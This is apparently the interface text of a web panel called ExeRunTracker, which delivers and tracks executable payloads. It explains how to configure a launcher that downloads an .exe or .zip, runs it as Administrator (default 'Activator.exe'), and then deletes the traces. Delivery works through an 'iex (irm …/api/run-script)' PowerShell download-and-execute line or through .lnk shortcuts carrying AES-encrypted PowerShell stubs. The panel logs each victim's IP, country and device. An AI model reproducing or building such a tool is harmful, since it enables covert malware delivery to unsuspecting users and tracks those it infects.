Use a local path or https link to an .exe or a .zip archive. For .zip, the launcher downloads to %TEMP%, extracts, runs the entry executable you set (default Activator.exe, or a relative path such as tools\MyApp.exe) as Administrator, then deletes the temp folder. Optionally set a splash image (jpg/png): the run script can show it while the payload downloads. Browse… only picks the file name in a normal browser — a panel will ask you to paste the full path (Проводник: Shift+ПКМ → «Копировать как путь» / Explorer: Shift+Right-click → Copy as path).
Keep the key private. Runs and Static.json update on each real file download: /dl/SECRET/… or /api/download?key=… (same file). The .lnk runs a standalone PowerShell stub with AES-encrypted payload, then loads the run script and downloads via /dl/… — each launch counts once. Fetching /api/run-script alone does not count. Plain /api/track does not add runs by default.
— share this; each download logs country + IP (same structure as Static.json).
— iex (irm …/api/run-script?key=…); the script then downloads via /dl/… (that step counts), shows splash if set, runs the payload from %LOCALAPPDATA%\ExeRunTracker\….
— downloads a .zip containing the .lnk; extract locally, then double-click the shortcut (same AES-encrypted flow).
— saves under %LOCALAPPDATA%\ExeRunTracker\ (counts one run).
Runs = each GET /dl/… or GET /api/download?key=… that completes (including when the launcher downloads the file). /api/run-script is only instructions — it does not add a run. Runs shows country/IP. Refresh this tab to update totals.
| Name | Path / link | ZIP entry | Splash | Runs | Last run |
|---|
| Time (UTC) | IP | Country | Location | Client / device | User-Agent |
|---|
Country and city come from the caller’s public IP (GeoIP, approximate). VPNs and proxies show the exit location. Private/LAN IPs cannot be geolocated.